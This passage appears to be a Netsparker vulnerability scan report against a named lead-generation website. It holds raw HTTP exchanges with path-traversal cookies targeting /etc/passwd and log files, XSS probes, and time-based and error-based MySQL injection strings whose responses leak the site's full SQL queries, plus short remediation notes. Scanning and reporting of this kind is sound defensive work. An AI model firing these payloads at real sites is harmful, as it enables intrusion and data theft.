OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:24 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=vaor1st9gh2tr7opjdlm5ughv2; path=/
Content-Length: 2923
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede0' at line 5
Forbidden Resource

Forbidden Resource
1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /js/

/js/ CONFIRMED

http://www.insideup.com/js/

Request

GET /js/ HTTP/1.1
Referer: http://www.insideup.com/js/jquery-1.2.1.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=F53C9933FE14A39B648D7D0BA68B6BA5
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Wed, 20 Apr 2011 02:15:15 GMT
Server: Apache/2.2.9 (Fedora)
Content-Length: 286
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /js/on this server.</p><hr><address>Apache/2.2.9 (Fedora) Server at www.insideup.com Port 80</address></body></html>
MySQL Database Identified

MySQL Database Identified
1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the target web site is using a MySQL Server. This is generally not a security issue and is reported here for information purposes.

Impact

This issue is reported as additional information only, there is no direct impact arising from this issue.
- /ppc/leadflow/wede00/project.php

/ppc/leadflow/wede00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select..

Request

GET /ppc/leadflow/wede00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:03 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=3jpuhm6d0i03rre8doid216i86; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'Duplicate entry '_!@4dilemma:1' for key 1
Directory Listing (Apache)

Directory Listing (Apache)
1 TOTAL
INFORMATION
The web server responded with a list of files located in the target directory.

Impact

An attacker can see the files located in the directory and could potentially access files which disclose sensitive information.

Actions to Take

  1. See the remedy for solution.
  2. Configure the web server to disallow directory listing requests.
  3. This can also be caused the web server products that don't have latest security patches. Ensure that all of the patches have been applied.

Remedy

Change your httpd.conf file. A secure configuration for the requested directory should be similar to the following one: 
<Directory /{YOUR DIRECTORY}>
	Options FollowSymLinks 
</Directory>
Remove the Indexes option from configuration. Do not forget to remove MultiViews as well.

External References

- /css/

/css/

https://www.insideup.com/css/

Request

GET /css/ HTTP/1.1
Referer: https://www.insideup.com/css/mainNewInsideup.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; insideup=subcategoryId%3D30005%26catId%3D30005%26iusrc%3Diupsc+%26attributeId_429%3D2785__Business+loan%26attributeId_438%3D2844__No+-+we+do+not+accept+Visa+or+Mastercard%26attributeId_529%3D3407__+%240+-+%245%2C000%26attributeId_430%3D2792__%2415%2C000+-+24%2C999%26attributeId_431%3D2801__A+business+that+I+am+about+to+start%26attributeId_432%3D2806__Business+expansion%26attributeId_433%3D2815__0-6+months+%28Start-up%29%26attributeId_434%3D2821__No+-+Clean+Credit%26attributeId_435%3D2824__%240+revenue+-+start-up%26attributeId_436%3D2832__+%2410%2C000+-+49%2C999%26attributeId_437%3D2840__Yes%26attributeId_342_g%3D2017__Accounting%2FFinance%26attributeId_343_g%3D2009__1-9%26attributeId_344_g%3D2041__Advertising%2FMarketing%2FPR%26firstname%3DFirst+Name%26lastname%3DLast+Name%26companyname%3DCompany+Name%26phone%3DPhone%26emailaddress%3DEmail%26zip%3DZip+code%26website%3Dn%2Fa
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:49:41 GMT
Server: Apache/2.2.9 (Fedora)
Content-Length: 3788
Connection: close
Content-Type: text/html;charset=ISO-8859-1


